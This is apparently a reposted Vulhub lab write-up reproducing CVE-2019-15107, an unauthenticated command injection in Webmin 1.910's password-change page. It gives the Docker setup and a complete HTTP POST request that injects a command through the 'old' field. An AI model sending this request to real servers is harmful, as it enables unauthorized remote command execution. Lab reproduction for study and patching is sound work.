当前位置:网站首页>Vulhub vulnerability recurrence 73_ Webmin
Vulhub vulnerability recurrence 73_ Webmin
2022-07-06 05:19:00 【Revenge_ scan】
CVE-2019-15107_Webmin Remote command execution vulnerability
Vulnerability Details
Webmin Is a management class Unix System management configuration tool , have Web page . In its find password page , There is a command injection vulnerability that does not require permission , Through this vulnerability, attackers can execute arbitrary system commands .
Reference link :
-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
- https://www.exploit-db.com/exploits/47230
- https://blog.firosolutions.com/exploits/webmin/
Environment building
shooting range :192.168.4.10_Ubuntu
Execute the following command , start-up webmin 1.910:
#docker-compose up -d
After execution , visit `https://your-ip:10000`, After ignoring the certificate, you can see webmin Login page for .

Loophole recurrence
The data package in the reference link is wrong , After reading the code , Only when sent user The value of the parameter is not known Linux In the case of users ( And the reference link is `user=root`), Will enter the modification `/etc/shadow` The place of , Trigger command injection vulnerability .
Send the following packets , You can execute the command `id`:
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
```

边栏推荐
- 集合详解之 Map + 面试题
- The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
- [mask requirements of OSPF and Isis in multi access network]
- 03. 开发博客项目之登录
- JS quick start (II)
- Postman assertion
- Hometown 20 years later (primary school exercises)
- TCP three handshakes you need to know
- js Array 列表 实战使用总结
- Zoom and pan image in Photoshop 2022
猜你喜欢

剑指 Offer II 039. 直方图最大矩形面积

idea一键导包

Summary of redis basic knowledge points

Application of Flody

Codeforces Round #804 (Div. 2) Editorial(A-B)

浅谈镜头滤镜的类型及作用

nacos-高可用seata之TC搭建(02)

03. 开发博客项目之登录

Implementing fuzzy query with dataframe

Building intelligent gray-scale data system from 0 to 1: Taking vivo game center as an example
随机推荐
C AES encrypts strings
Building intelligent gray-scale data system from 0 to 1: Taking vivo game center as an example
UCF(暑期团队赛二)
Drive development - the first helloddk
Collection + interview questions
Vulhub vulnerability recurrence 68_ ThinkPHP
Check the useful photo lossless magnification software on Apple computer
04. 项目博客之日志
[lgr-109] Luogu may race II & windy round 6
GAMES202-WebGL中shader的编译和连接(了解向)
[leetcode daily question] number of enclaves
GAMES202-WebGL中shader的編譯和連接(了解向)
Some common skills on unity inspector are generally used for editor extension or others
Yolov5 tensorrt acceleration
2022半年总结
Raspberry pie 3.5-inch white screen display connection
浅谈镜头滤镜的类型及作用
Microblogging hot search stock selection strategy
[mask requirements of OSPF and Isis in multi access network]
Graduation design game mall